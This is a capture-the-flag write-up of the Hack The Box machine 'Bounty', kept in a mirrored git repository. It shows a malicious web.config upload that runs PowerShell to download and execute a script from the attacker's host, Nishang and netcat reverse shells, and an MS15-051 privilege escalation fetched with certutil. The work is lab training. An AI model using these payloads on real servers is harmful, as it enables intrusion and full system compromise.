oxeo0/hacking-blogposts
1
0
Fork 0
mirror of http://git.nowherejezfoltodf4jiyl6r56jnzintap5vyjlia7fkirfsnfizflqd.onion/nihilist/hacking-blogposts.git synced 2025-05-16 04:16:59 +00:00
Code Issues Projects Releases Packages Wiki Activity Actions
hacking-blogposts/Easy/19.md

393 lines
14 KiB
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

---
search:
exclude: true
---
# Bounty Writeup
![](img/19.png)
## Introduction :
Bounty is an easy Windows box that was released back in June 2018.
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
λ nihilist [ 93.22.134.89 ] [~] → nmap -sC -sV 10.10.10.93
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 08:23 CET
Nmap scan report for 10.10.10.93
Host is up (0.095s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.16 seconds
## **Part 2 : Getting User Access**
It seems like our nmap scan found the 80th port opened, we will run a gobuster scan in order to enumerate the directories we will be able to work with.
λ nihilist [ 93.22.134.89 ] [~] → gobuster -u http://10.10.10.93/ -w /usr/share/wordlists/directory-list-2.3-medium.txt
=====================================================
Gobuster v2.0.0 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.93/
[+] Threads : 50
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions : aspx
[+] Timeout : 10s
=====================================================
2019/11/25 08:28:36 Starting gobuster
=====================================================
/transfer.aspx (Status: 200)
/uploadedFiles (Status: 301)
Gobuster seems to have found 2 interesting pages : -/transfer.aspx (which returns a status 200) -/uploadedfiles (which returns a status 301)
![](prg/19_001.png) ![](prg/19_002.png)
Searching for the keywords **"IIS 7.5 RCE"** , the results tell us that we should be able to upload a file **web.config**
We will submit our script to the website and ready our terminal running the command nc with the -lvnp flags in order to catch the incoming connection to our 9001 port.
_web.config:_
<****?xml version="1.0" encoding="UTF-8"?> <****configuration> <****system.webServer> <****handlers accessPolicy="Read, Script, Write"> <****add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> <****/handlers> <****security> <****requestFiltering> <****fileExtensions> <****remove fileExtension=".config" /> <****hiddenSegments> <****/fileExtensions> <****remove segment="web.config" /> <****/hiddenSegments> <****/requestFiltering> <****/security> <****/system.webServer> <****/configuration> <****%@ Language=VBScript %> <****%
Set s = CreateObject("WScript.Shell")
Set cmd = s.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('ht>
o = cmd.StdOut.Readall()
Response.write(o)
%****>****
Our nihilist.ps1 script is a copy of Nishang's [Invoke-PowerShellTcp.ps1](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1)
_Terminal 1:_
λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bounty] → curl -sk https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1 > nihilist.ps1
λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bounty] → echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.48 -Port 9001' >> nihilist.ps1
As it is written above, our nihilist.ps1 script will attempt to send a reverse shell connection to our machine at the of 10.10.14.48 adress, onto it's 9001st port. So we will ready our terminal with the nc command and it's -lvnp flags in order to catch the incoming connection.
λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bounty] → nc -lvnp 9001
We submit our web.config file
![](prg/19_004.png)
We then browse to it, and then we wait for the reverse shell to come back to our terminal.
_Terminal 1:_
λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
→ python2 -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
_Terminal 2:_
λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
→ nc -lvnp 9001
_Terminal 3:_
λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
→ curl -vsk http://10.10.10.93/UploadedFiles/web.config
* Trying 10.10.10.93:80...
* TCP_NODELAY set
* Connected to 10.10.10.93 (10.10.10.93) port 80 (#0)
> GET /UploadedFiles/web.config HTTP/1.1
> Host: 10.10.10.93
> User-Agent: curl/7.67.0
> Accept: */*
>
_Terminal 1:_
λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
→ python2 -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
10.10.10.93 - - [02/Dec/2019 08:22:36] "GET /nihilist.ps1 HTTP/1.1" 200 -
_Terminal 2:_
λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
→ nc -lvnp 9001
Connection from 10.10.10.93:49158
Windows PowerShell running as user BOUNTY$ on BOUNTY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\windows\system32\inetsrv>
PS C:\windows\system32\inetsrv> whoami
bounty\merlin
And we're in ! we are logged in as the user merlin, now let's grab the user flag located in C:\users\merlin\desktop
![](prg/19_005.png)
PS C:\windows\system32\inetsrv> cd ../../..
PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 5/30/2018 4:14 AM inetpub
d---- 7/14/2009 6:20 AM PerfLogs
d-r-- 6/10/2018 3:43 PM Program Files
d-r-- 7/14/2009 8:06 AM Program Files (x86)
d-r-- 5/31/2018 12:18 AM Users
d---- 5/31/2018 11:37 AM Windows
PS C:\> cd Users\Merlin
PS C:\Users\Merlin> cd Desktop
PS C:\Users\Merlin\Desktop> more user.txt
e2XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
## **Part 3 : Getting Root Access**
In order to escalate privileges from merlin to the SYSTEM user, we need to first look at the results of the systeminfo command.
_Terminal 1:_
PS C:\Users> systeminfo
Host Name: BOUNTY
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-402-3606965-84760
Original Install Date: 5/30/2018, 12:22:24 AM
System Boot Time: 12/2/2019, 8:56:08 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,588 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,595 MB
Virtual Memory: In Use: 500 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.93
We see that there are no Hotfixes onto the machine, which indicates a serious security flaw. So we will attempt to escalate privileges using the MS15-051. we will not forget that we will be applying a privilege escalation binary onto a 64 bit machine.
Download from https://eternallybored.org/misc/netcat/
_Terminal 2:_
λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
→ wget https://github.com/euphrat1ca/ms15-051/raw/master/ms15-051/ms15-051/x64/ms15-051.exe
--2019-12-02 09:07:00-- https://github.com/euphrat1ca/ms15-051/raw/master/ms15-051/ms15-051/x64/ms15-051.exe
Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
Resolving github.com (github.com)... 140.82.118.3
Connecting to github.com (github.com)|140.82.118.3|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/euphrat1ca/ms15-051/master/ms15-051/ms15-051/x64/ms15-051.exe [following]
--2019-12-02 09:07:00-- https://raw.githubusercontent.com/euphrat1ca/ms15-051/master/ms15-051/ms15-051/x64/ms15-051.exe
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.120.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.120.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 55296 (54K) [application/octet-stream]
Saving to: ms15-051.exe
ms15-051.exe 100%[===============================>] 54.00K --.-KB/s in 0.06s
2019-12-02 09:07:01 (852 KB/s) - ms15-051.exe saved [55296/55296]
λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
→ python2 -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
Now we just need to download both the ms15-051.exe and nc.exe binary onto our local machine, at the IP 10.10.14.48 at the 8000th port.
_Terminal 1:_
PS C:\Users> certutil -urlcache -f http://10.10.14.48:8000/ms15-051.exe nihilist_privesc.exe
**** Online ****
CertUtil: -URLCache command FAILED: 0x80070005 (WIN32: 5)
CertUtil: Access is denied.
Let's not forget to download it onto the machine within a folder where we have the write rights.
PS C:\Users> cd ..
PS C:\> cd Windows
PS C:\Windows> cd temp
Now we should be able to download our 2 binaries
PS C:\Windows\temp> certutil -urlcache -f http://10.10.14.48:8000/ms15-051.exe nihilist_privesc.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
PS C:\windows\temp> certutil -urlcache -f http://10.10.14.48:8000/nc64.exe nc64.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
Our binaries got uploaded ! now before we execute it we will ready our reverse shell terminal with the same nc command to catch the incoming connection.
_Terminal 2:_
λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
→ nc -lvnp 9999
_Terminal 1:_
PS C:\windows\temp> certutil -urlcache -f http://10.10.14.48:8000/nc64.exe nc64.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
PS C:\windows\temp> ls
Directory: C:\windows\temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 6/10/2018 3:44 PM vmware-SYSTEM
-a--- 5/30/2018 3:19 AM 0 DMI5FAC.tmp
-a--- 12/2/2019 10:12 AM 55296 nihilist_privesc.exe
-a--- 12/2/2019 11:02 AM 43696 nc64.exe
-a--- 6/10/2018 3:44 PM 203777 vminst.log
-a--- 12/2/2019 8:56 AM 57269 vmware-vmsvc.log
-a--- 6/11/2018 12:47 AM 22447 vmware-vmusr.log
-a--- 12/2/2019 8:56 AM 910 vmware-vmvss.log
PS C:\windows\temp> ./nihilist_privesc.exe "c:\windows\temp\nc64.exe -e cmd 10.10.14.48 9999"
_Terminal 2:_
λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
→ nc -lvnp 9999
Connection from 10.10.10.93:49189
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\windows\temp>whoami
whoami
nt authority\system
C:\windows\temp>cd ..
cd ..
C:\Windows>cd ..
cd ..
C:\>cd Users
cd Users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is 5084-30B0
Directory of C:\Users
05/30/2018 11:18 PM <****DIR> .
05/30/2018 11:18 PM <****DIR> ..
05/30/2018 11:18 PM <****DIR> Administrator
05/30/2018 03:44 AM <****DIR> Classic .NET AppPool
05/29/2018 11:22 PM <****DIR> merlin
05/30/2018 04:44 AM <****DIR> Public
0 File(s) 0 bytes
6 Dir(s) 11,884,384,256 bytes free
C:\Users>cd Administrator
cd Administrator
C:\Users\Administrator>cd Desktop
cd Desktop
C:\Users\Administrator\Desktop>type root.txt
type root.txt
c8XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it ! we have been able to get a root shell onto the box and we have been able to print out the root flag.
## **Conclusion**
Here we can see the progress graph :
![](img/19_graph.png)
Reference in a new issue View git blame Copy permalink